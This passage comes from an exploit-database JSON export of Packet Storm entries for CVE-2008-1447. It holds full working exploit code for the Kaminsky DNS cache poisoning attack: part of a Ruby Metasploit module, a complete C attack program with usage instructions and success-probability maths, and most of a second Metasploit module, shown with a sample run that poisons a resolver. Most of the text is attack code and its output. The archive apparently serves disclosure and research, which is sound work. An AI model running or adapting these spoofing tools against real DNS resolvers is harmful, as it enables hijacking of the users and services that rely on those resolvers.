and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) \nreq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored \nreq.qr = 1 \nreq.aa = 1 \n \nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\") \nend \n 
\n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nprint_status(\"Poisoning successful after #{queries} attempts: #{domain} == #{newdns}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68473/bailiwicked_domain.rb.txt"}, {"lastseen": "2016-12-05T22:15:52", "description": "", "published": "2008-07-25T00:00:00", "type": "packetstorm", "title": "bind9x-poison.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-25T00:00:00", "id": "PACKETSTORM:68500", "href": "https://packetstormsecurity.com/files/68500/bind9x-poison.txt.html", "sourceData": "`/* \n* Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack \n* \n* Compilation: \n* $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm \n* \n* Dependency: libdnet (aka libdumbnet-dev under Ubuntu) \n* \n* Author: marc.bevand at rapid7 dot com \n*/ \n \n#define _BSD_SOURCE \n \n#include <sys/types.h> \n#include <err.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <math.h> \n#include <time.h> \n#include <unistd.h> \n#include <dumbnet.h> \n \n#define DNSF_RESPONSE (1<<15) \n#define DNSF_AUTHORITATIVE (1<<10) 
\n#define DNSF_REC_DESIRED (1<<8) \n#define DNSF_REC_AVAILABLE (1<<7) \n \n#define TYPE_A 0x1 \n#define TYPE_NS 0x2 \n#define CLASS_IN 0x1 \n \nstruct dns_pkt \n{ \nuint16_t txid; \nuint16_t flags; \nuint16_t nr_quest; \nuint16_t nr_ans; \nuint16_t nr_auth; \nuint16_t nr_add; \n} __attribute__ ((__packed__)); \n \nvoid format_domain(u_char *buf, unsigned size, unsigned *len, const char *name) \n{ \nunsigned bufi, i, j; \nbufi = i = j = 0; \nwhile (name[i]) \n{ \nif (name[i] == '.') \n{ \nif (bufi + 1 + (i - j) > size) \nfprintf(stderr, \"format_domain overflow\\n\"), exit(1); \nbuf[bufi++] = i - j; \nmemcpy(buf + bufi, name + j, i - j); \nbufi += i - j; \nj = i + 1; \n} \ni++; \n} \nif (bufi + 1 + 2 + 2 > size) \nfprintf(stderr, \"format_domain overflow\\n\"), exit(1); \nbuf[bufi++] = 0; \n*len = bufi; \n} \n \nvoid format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class) \n{ \nuint16_t tmp; \n// name \nformat_domain(buf, size, len, name); \n// type \ntmp = htons(type); \nmemcpy(buf + *len, &tmp, sizeof (tmp)); \n*len += sizeof (tmp); \n// class \ntmp = htons(class); \nmemcpy(buf + *len, &tmp, sizeof (tmp)); \n*len += sizeof (tmp); \n} \n \nvoid format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data) \n{ \nformat_qr(buf, size, len, name, type, class); \n// ttl \nttl = htonl(ttl); \nmemcpy(buf + *len, &ttl, sizeof (ttl)); \n*len += sizeof (ttl); \n// data length + data \nuint16_t dlen; \nstruct addr addr; \nswitch (type) \n{ \ncase TYPE_A: \ndlen = sizeof (addr.addr_ip); \nbreak; \ncase TYPE_NS: \ndlen = strlen(data) + 1; \nbreak; \ndefault: \nfprintf(stderr, \"format_rr: unknown type %02x\", type); \nexit(1); \n} \ndlen = htons(dlen); \nmemcpy(buf + *len, &dlen, sizeof (dlen)); \n*len += sizeof (dlen); \n// data \nunsigned len2; \nswitch (type) \n{ \ncase TYPE_A: \nif (addr_aton(data, &addr) < 0) \nfprintf(stderr, \"invalid destination IP: 
%s\", data), exit(1); \nmemcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip)); \n*len += sizeof (addr.addr_ip); \nbreak; \ncase TYPE_NS: \nformat_domain(buf + *len, size - *len, &len2, data); \n*len += len2; \nbreak; \ndefault: \nfprintf(stderr, \"format_rr: unknown type %02x\", type); \nexit(1); \n} \n} \n \nvoid dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name) \n{ \nu_char *out = buf; \nstruct dns_pkt p = { \n.txid = htons(txid), \n.flags = htons(flags), \n.nr_quest = htons(1), \n.nr_ans = htons(0), \n.nr_auth = htons(0), \n.nr_add = htons(0), \n}; \nu_char qr[256]; \nunsigned l; \nformat_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN); \nif (sizeof (p) + l > size) \nfprintf(stderr, \"dns_query overflow\"), exit(1); \nmemcpy(out, &p, sizeof (p)); \nout += sizeof (p); \nmemcpy(out, qr, l); \nout += l; \n*len = sizeof (p) + l; \n} \n \nvoid dns_response(u_char *buf, unsigned size, unsigned *len, \nuint16_t txid, uint16_t flags, \nconst char *q_name, const char *q_ip, \nconst char *domain, const char *auth_name, const char *auth_ip) \n{ \nu_char *out = buf; \nu_char *end = buf + size; \nu_char rec[256]; \nunsigned l_rec; \nuint32_t ttl = 24*3600; \nstruct dns_pkt p = { \n.txid = htons(txid), \n.flags = htons(flags), \n.nr_quest = htons(1), \n.nr_ans = htons(1), \n.nr_auth = htons(1), \n.nr_add = htons(1), \n}; \n(void)domain; \n*len = 0; \nif (out + *len + sizeof (p) > end) \nfprintf(stderr, \"dns_response overflow\"), exit(1); \nmemcpy(out + *len, &p, sizeof (p)); *len += sizeof (p); \n// queries \nformat_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN); \nif (out + *len + l_rec > end) \nfprintf(stderr, \"dns_response overflow\"), exit(1); \nmemcpy(out + *len, rec, l_rec); *len += l_rec; \n// answers \nformat_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN, \nttl, q_ip); \nif (out + *len + l_rec > end) \nfprintf(stderr, \"dns_response overflow\"), exit(1); \nmemcpy(out + *len, rec, l_rec); *len 
+= l_rec; \n// authoritative nameservers \nformat_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN, \nttl, auth_name); \nif (out + *len + l_rec > end) \nfprintf(stderr, \"dns_response overflow\"), exit(1); \nmemcpy(out + *len, rec, l_rec); *len += l_rec; \n// additional records \nformat_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN, \nttl, auth_ip); \nif (out + *len + l_rec > end) \nfprintf(stderr, \"dns_response overflow\"), exit(1); \nmemcpy(out + *len, rec, l_rec); *len += l_rec; \n} \n \nunsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name) \n{ \nunsigned len = 0; \n// ip \nstruct ip_hdr *ip = (struct ip_hdr *)buf; \nip->ip_hl = 5; \nip->ip_v = 4; \nip->ip_tos = 0; \nip->ip_id = rand() & 0xffff; \nip->ip_off = 0; \nip->ip_ttl = IP_TTL_MAX; \nip->ip_p = 17; // udp \nip->ip_sum = 0; \nstruct addr addr; \nif (addr_aton(srcip, &addr) < 0) \nfprintf(stderr, \"invalid source IP: %s\", srcip), exit(1); \nip->ip_src = addr.addr_ip; \nif (addr_aton(dstip, &addr) < 0) \nfprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1); \nip->ip_dst = addr.addr_ip; \n// udp \nstruct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); \nudp->uh_sport = htons(1234); \nudp->uh_dport = htons(53); \n// dns \ndns_query(buf + IP_HDR_LEN + UDP_HDR_LEN, \n(unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, \nrand(), DNSF_REC_DESIRED, name); \n// udp len \nlen += UDP_HDR_LEN; \nudp->uh_ulen = htons(len); \n// ip len & cksum \nlen += IP_HDR_LEN; \nip->ip_len = htons(len); \nip_checksum(buf, len); \nreturn len; \n} \n \nunsigned build_response(u_char *buf, const char *srcip, const char *dstip, \nuint16_t port_resolver, uint16_t txid, \nconst char *q_name, const char *q_ip, \nconst char *domain, const char *auth_name, const char *auth_ip) \n{ \nunsigned len = 0; \n// ip \nstruct ip_hdr *ip = (struct ip_hdr *)buf; \nip->ip_hl = 5; \nip->ip_v = 4; \nip->ip_tos = 0; \nip->ip_id = rand() & 0xffff; \nip->ip_off = 0; 
\nip->ip_ttl = IP_TTL_MAX; \nip->ip_p = 17; // udp \nip->ip_sum = 0; \nstruct addr addr; \nif (addr_aton(srcip, &addr) < 0) \nfprintf(stderr, \"invalid source IP: %s\", srcip), exit(1); \nip->ip_src = addr.addr_ip; \nif (addr_aton(dstip, &addr) < 0) \nfprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1); \nip->ip_dst = addr.addr_ip; \n// udp \nstruct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); \nudp->uh_sport = htons(53); \nudp->uh_dport = htons(port_resolver); \n// dns \ndns_response(buf + IP_HDR_LEN + UDP_HDR_LEN, \n(unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, \ntxid, DNSF_RESPONSE | DNSF_AUTHORITATIVE, \nq_name, q_ip, domain, auth_name, auth_ip); \n// udp len \nlen += UDP_HDR_LEN; \nudp->uh_ulen = htons(len); \n// ip len & cksum \nlen += IP_HDR_LEN; \nip->ip_len = htons(len); \nip_checksum(buf, len); \nreturn len; \n} \n \nvoid usage(char *name) \n{ \nfprintf(stderr, \"Usage: %s <ip-querier> <ip-resolver> <ip-authoritative> \" \n\"<port-resolver> <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>\\n\" \n\" <ip-querier> Source IP used when sending queries for random hostnames\\n\" \n\" (typically your IP)\\n\" \n\" <ip-resolver> Target DNS resolver to attack\\n\" \n\" <ip-authoritative> One of the authoritative DNS servers for <domain>\\n\" \n\" <port-resolver> Source port used by the resolver when forwarding queries\\n\" \n\" <subhost> Poison the cache with the A record <subhost>.<domain>\\n\" \n\" <domain> Domain name, see <subhost>.\\n\" \n\" <any-ip> IP of your choice to be associated to <subhost>.<domain>\\n\" \n\" <attempts> Number of poisoning attemps, more attempts increase the\\n\" \n\" chance of successful poisoning, but also the attack time\\n\" \n\" <repl-per-attempt> Number of spoofed replies to send per attempt, more replies\\n\" \n\" increase the chance of successful poisoning but, but also\\n\" \n\" the rate of packet loss\\n\" \n\"Example:\\n\" \n\" $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 
1.1.1.1 8192 16\\n\" \n\"This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\\n\" \n\"in r.r.r.r's cache. The chance of successfully poisoning the resolver with\\n\" \n\"this example (8192 attempts and 16 replies/attempt) is 86%%\\n\" \n\"(1-(1-16/65536)**8192). This example also requires a bandwidth of about\\n\" \n\"2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\\n\" \n\"8 bits/byte) and takes about 80 secs to complete (8192 attempts /\\n\" \n\"100 attempts/sec).\\n\", \nname, name); \n} \n \nint main(int argc, char **argv) \n{ \nif (argc != 10) \nusage(argv[0]), exit(1); \nconst char *querier = argv[1]; \nconst char *ip_resolver = argv[2]; \nconst char *ip_authoritative = argv[3]; \nuint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0); \nconst char *subhost = argv[5]; \nconst char *domain = argv[6]; \nconst char *anyip = argv[7]; \nuint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0); \nuint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0); \nif (domain[strlen(domain) - 1 ] != '.') \nfprintf(stderr, \"domain must end with dot(.): %s\\n\", domain), exit(1); \nprintf(\"Chance of success: 1-(1-%d/65536)**%d = %.2f\\n\", replies, attempts, 1 - pow((1 - replies / 65536.), attempts)); \nsrand(time(NULL)); \nint unique = rand() + (rand() << 16); \nu_char buf[IP_LEN_MAX]; \nunsigned len; \nchar name[256]; \nchar ns[256]; \nip_t *iph; \nif ((iph = ip_open()) == NULL) \nerr(1, \"ip_open\"); \nint cnt = 0; \nwhile (cnt < attempts) \n{ \n// send a query for a random hostname \nsnprintf(name, sizeof (name), \"%08x%08x.%s\", unique, cnt, domain); \nlen = build_query(buf, querier, ip_resolver, name); \nif (ip_send(iph, buf, len) != len) \nerr(1, \"ip_send\"); \n// give the resolver enough time to forward the query and be in a state \n// where it waits for answers; sleeping 10ms here limits the number of \n// attempts to 100 per sec \nusleep(10000); \n// send spoofed replies, each reply contains: \n// - 1 query: 
query for the \"random hostname\" \n// - 1 answer: \"random hostname\" A 1.1.1.1 \n// - 1 authoritative nameserver: <domain> NS <subhost>.<domain> \n// - 1 additional record: <subhost>.<domain> A <any-ip> \nsnprintf(ns, sizeof (ns), \"%s.%s\", subhost, domain); \nunsigned r; \nfor (r = 0; r < replies; r++) \n{ \n// use a txid that is just 'r': 0..(replies-1) \nlen = build_response(buf, ip_authoritative, ip_resolver, \nport_resolver, r, name, \"1.1.1.1\", domain, ns, anyip); \nif (ip_send(iph, buf, len) != len) \nerr(1, \"ip_send\"); \n} \ncnt++; \n} \nip_close(iph); \nreturn 0; \n} \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68500/bind9x-poison.txt"}, {"lastseen": "2016-12-05T22:20:49", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_host.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68471", "href": "https://packetstormsecurity.com/files/68471/bailiwicked_host.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n \n===============/======================================================== \nExploit ID: CAU-EX-2008-0002 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_host.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit \nTested: BIND 9.4.1-9.4.2 \nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n 
\nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious host entry \ninto the target nameserver. By causing the target nameserver to query \nfor random hostnames at the target domain, the attacker can spoof a \nresponse to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. \n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n_ _ _ _ \n| | | | (_) | \n_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ \n| '_ ` _ \\ / _ \\ __/ _` / __| '_ \\| |/ _ \\| | __| \n| | | | | | __/ || (_| \\__ \\ |_) | | (_) | | |_ \n|_| |_| |_|\\___|\\__\\__,_|___/ .__/|_|\\___/|_|\\__| \n| | \n|_| \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 72 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_host \nmsf auxiliary(bailiwicked_host) > show options \n \nModule options: \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \nHOSTNAME pwned.example.com yes Hostname to hijack \nNEWADDR 1.3.3.7 yes New address for hostname \nRECONS 208.67.222.222 yes Nameserver used for reconnaissance \nRHOST yes The target address \nSRCPORT yes The target server's source query port (0 for automatic) \nXIDS 10 yes Number of XIDs to try for each query \n \nmsf auxiliary(bailiwicked_host) > set RHOST A.B.C.D \nRHOST => A.B.C.D \n \nmsf auxiliary(bailiwicked_host) > check \n[*] Using the Metasploit service to verify exploitability... 
\n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \n \nmsf auxiliary(bailiwicked_host) > set SRCPORT 0 \nSRCPORT => 0 \n \nmsf auxiliary(bailiwicked_host) > run \n[*] Switching to target port 48178 based on Metasploit service \n[*] Targeting nameserver A.B.C.D \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got answer with 2 answers, 0 authorities \n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com. \n[*] Querying recon nameserver for address of ns89.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45 \n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com.... \n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com. \n[*] Querying recon nameserver for address of ns90.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45 \n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com.... \n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... 
\n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7 \n[*] Auxiliary module execution completed \nmsf auxiliary(bailiwicked_host) > \n \nmsf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D \n[*] exec: nslookup pwned.example.com A.B.C.D \n \nServer: A.B.C.D \nAddress: A.B.C.D#53 \n \nNon-authoritative answer: \nName: pwned.example.com \nAddress: 1.3.3.7 \n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. \n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Host Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single \nmalicious host entry into the target nameserver by sending random sub-domain \nqueries to the target DNS server coupled with spoofed replies to those \nqueries from the authoritative nameservers for the domain which contain a \nmalicious host entry for the hostname to be poisoned in the authority and \nadditional records sections. Eventually, a guessed ID will match and the \nspoofed packet will get accepted, and due to the additional hostname entry \nbeing within bailiwick constraints of the original request the malicious host \nentry will get cached. 
\n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5585 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ], \n], \n'Privileged' => true, \n'Targets' => \n[ \n[\"BIND\", \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n}, \n], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']), \nOptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: 
#{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \nhostname = datastore['HOSTNAME'] + '.' \naddress = datastore['NEWADDR'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nttl = datastore['TTL'].to_i \nxidbase = rand(4)+2*10000 \n \ndomain = hostname.match(/[^\\x2e]+\\x2e[^\\x2e]+\\x2e$/)[0] \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already cached \nbegin \nquery = 
Resolv::DNS::Message.new \nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nbegin \ncached = false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nt = Time.now + ttl \nprint_status(\"Failure: This hostname is already in the target cache: #{name} == #{address}\") \nprint_status(\" Cache entry expires on #{t.to_s}... sleeping.\") \ncached = true \nsleep ttl \nend \nend \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{hostname} as #{address}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for 
#{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname))) \nreq.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.qr = 1 \nreq.ra = 1 \n 